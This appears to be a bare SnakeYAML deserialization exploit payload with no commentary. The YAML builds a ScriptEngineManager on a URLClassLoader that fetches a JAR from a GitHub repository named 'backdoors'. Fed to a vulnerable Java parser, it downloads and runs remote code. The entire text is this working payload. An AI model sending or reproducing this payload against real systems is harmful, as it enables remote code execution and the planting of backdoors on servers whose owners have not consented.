!!javax.script.ScriptEngineManager
  javax.script.ScriptEngineManager: !!java.net.URLClassLoader
    uRLs:
      - !!java.net.URL
        url: "https://github.com/elefantesagradodeluzinfinita/backdoors/raw/main/SimpleHttpGet.jar"
